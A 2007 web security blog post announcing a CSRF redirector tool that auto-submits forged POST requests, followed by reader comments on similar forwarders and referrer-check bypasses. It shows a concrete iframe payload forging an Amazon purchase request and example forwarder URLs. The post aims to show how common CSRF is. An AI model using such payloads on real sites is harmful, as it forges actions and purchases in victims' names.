About the Author

Chris Shiflett

Chris Shiflett is an author and speaker who leads the web application security practice at OmniTI.

CSRF Redirector

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more.

For example, the following IFrame exploits the Amazon vulnerability:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />

I may add more features at some point. Until then, enjoy!

About This Post

CSRF Redirector was posted on Wed, 18 Jul 2007 at 03:49:53 GMT.

16 Comments

1. drew's Gravatardrew said:

CSRF redirectors are useful. I have one that I've been using internally that strips out the HTTP referrer header using the javascript: null referrer technique. I've run in to a handful of sites check the referrer but are still vulnerable CSRF using a null referrer.

Eventually I'll post a link to it on my blog... http://int2e.com/blog/

Wed, 18 Jul 2007 at 05:41:57 GMT Link

2. Sid's GravatarSid said:

Nice idea but I've already seen people using tinyurl for this purpose. Of course the only difference is that people can tell tinyurl to always preview links in which case that won't work.

Wed, 18 Jul 2007 at 07:37:44 GMT Link

3. Sid's GravatarSid said:

Sorry, it seems I can't read (just woke up). Of course tinyurl isn't being used for those POST CSRFs, just the GET ones. I have to say though, I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

Mine could be used for CSRF (if it was automated) and yours can be used for XSS, so we made the same thing didn't we?

Oh btw ;p

Wed, 18 Jul 2007 at 07:46:22 GMT Link

4. Chris Shiflett's GravatarChris Shiflett said:

I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

The automation is important for CSRF. In addition, it hides the response to the POST request, making the attack easier to conceal in various contexts.

And thanks for the bug report. :-)

Wed, 18 Jul 2007 at 13:59:27 GMT Link

5. drew's Gravatardrew said:

Neat, looks like the CSRF redirector works. ;)

However I can't think of a way to make link indefinitely replicate itself.

Wed, 18 Jul 2007 at 17:20:24 GMT Link

6. Chris Shiflett's GravatarChris Shiflett said:

Yes, it works. :-)

I first disclosed the fact that my comments form is vulnerable to CSRF about a year and a half ago:

http://shiflett.org/blog/2006/mar/p...ch-2006-edition

Surprisingly, no one has exploited the vulnerability, despite the fact that there have been a countless number of XSS attempts.

Now that people can log in, I should address the vulnerability, but it's interesting to note that it hasn't been exploited until now. By contrast, the XSS vulnerability in the redirector was discovered (and fixed) within a few hours.

Wed, 18 Jul 2007 at 17:48:09 GMT Link

7. Chris Shiflett's GravatarChris Shiflett said:

Actually, to be clear, the CSRF vulnerability was exploited in the post where I mentioned it, but it hasn't been exploited since.

You might be wondering why I find this interesting or why I have honeypots on my site. The reason is that I want to be able to get a feel for the popularity (or lack thereof) of CSRF. I suspect the number of people actively trying to discover CSRF vulnerabilities is much smaller than the number of people actively trying to discover XSS vulnerabilities, and as soon as this is no longer true, CSRF is going to be a much bigger problem.

Wed, 18 Jul 2007 at 18:10:07 GMT Link

8. pdp's Gravatarpdp said:

hi Chris,

we have a CSRF forwarder script as well located at: http://www.gnucitizen.org/util/csrf

it is quite tiny and flexible... there are plans to add features to hide the refer as well.

this is how I use it for GET:

http://www.gnucitizen.org/util/csrf?_method=GET&_url=http%3A//www.google.com/search&q=test

and this is for POST:

http://www.gnucitizen.org/util/csrf?_url=http%3A//www.google.com/search&q=test

http://www.gnucitizen.org/util/csrf?_method=POST&_url=http%3A//www.google.com/search&q=test

quite simple

Fri, 20 Jul 2007 at 14:28:59 GMT Link

9. killerguppy's Gravatarkillerguppy said:

Great little tool. I'm testing it on several vuln scripts i wrote awhile ago for a demo.

Is there anyway you could post the source code? I hate using tools if I have no idea how they work. Also, I'm interested to see if/how you got around cookie/session authentication. Every time I tried to make a tool like this, linking the vulnerable form to the victim user was always a huge problem that I couldn't get past without some XSS or a sessionid in the url....

Sun, 22 Jul 2007 at 17:14:14 GMT Link

10. q's Gravatarq said:

Nice tool.

ps, i was the young college student at OSCON asking you a lot of questions after you got done with "Security 2.0"

Fri, 10 Aug 2007 at 00:04:32 GMT Link

11. q's Gravatarq said:

oh by the way, the guy that was in the room before you at OSCON said some stuff in his session that was wrong. He said that if you make a form use POST it will be protected from CSRF. I didn't want to say anything because like 2 seconds before he said this he asked how many people had heard of CSRF and like 2 people raised their hands including me. I don't think anyone would've taken me seriously, being a 17-year-old and looking like one. Besides, I don't like being at the center of attention. I also hate arguing. Maybe i should've said something.

Fri, 10 Aug 2007 at 07:33:57 GMT Link

12. Replyer's GravatarReplyer said:

q said: Maybe i should've said something.

Sometimes you're better off saying nothing.

Sat, 11 Aug 2007 at 03:16:19 GMT Link

13. q's Gravatarq said:

i posted about this on my new blog

http://qqq3468349856.blogspot.com/

Mon, 13 Aug 2007 at 04:35:01 GMT Link

14. Steve's GravatarSteve said:

There's a useful online tool for converting GET requests to POST requests at:

http://www.gettopost.com.

Just enter a URL and it will convert any GET parameters into a POST request and then submit the POST. It also excepts URLs tagged onto the base name e.g:

www.gettopost.com/gettopost.html?http://www.url.com?postparam1=value1

Also on the site is a useful bookmarklet for extracting the form parameter values that are filled in on all forms in any webpage. HTH, Steve

Sat, 16 Feb 2008 at 13:42:42 GMT Link

15. Alexander Gre's GravatarAlexander Gre said:

> I've run in to a handful of sites check the referrer but are still > vulnerable CSRF using a null referrer.

how it works? can i see the html/javascript-code?

Thu, 24 Apr 2008 at 21:14:35 GMT Link

16. MustLive's GravatarMustLive said:

Chris.

As I wrote you by email, recently I have found one bug in your CSRF redirector.

When using char "[" (in ASCII or urlencoded) it is removing with the following symbols from query parameters (in body of your redirector).

http://shiflett.org/csrf.php?csrf=h...amp;name[i]=val

So I wish you to fix this bug (add normal support of "[" char) in your web application.

Tue, 09 Dec 2008 at 22:54:07 GMT Link

Post A Comment

Personal Details and Comment

Style Guide

Line breaks are converted to paragraphs. Also use:

  • <a href="" title="">text</a>1
  • <em>text</em>
  • <blockquote><p>text</p></blockquote>
  • <code>2  <?php  if ($foo) {      $foo = TRUE;  }  ?></code>
  1. Note: <code> can be used inline (e.g. in paragraphs) or in a block as shown. Include whitespace and newlines in blocks.

Please enter Chris (my first name) below. This is a primitive spam prevention technique, and I apologize for the inconvenience.

Preview and Submit

Upcoming Talks

php|tek

19 - 22 May 2009

At Sheraton Gateway Suites Chicago O'Hare, Chicago, Illinois.

OSCON

20 - 24 Jul 2009

At San Jose McEnery Convention Center, San Jose, California.

New Comments

Ronald wrote:

A little hard for a rookie like me, but useful. I also thought you'd like to know there is a grea...

Posted in A rev="canonical" HTTP Header
Alex wrote:

Aren't you forgetting that the session will expire if _write() is never called? That excludes ...

Posted in
Andy Mabbett wrote:

@Chris Shiflett, #4, belatedly: Google only accepts rel=canonical within the same domain. My s...

Posted in A rev="canonical" HTTP Header
Kenneth Udut wrote:

I've implemented this rev="canonical" idea on http://free.naplesplus.us in the hopes that it catc...

Posted in Save the Internet with rev="canonical"
Mark wrote:

After reading your article and all the comments, what I got out of this was that sessions are not...

Posted in

Browse Comments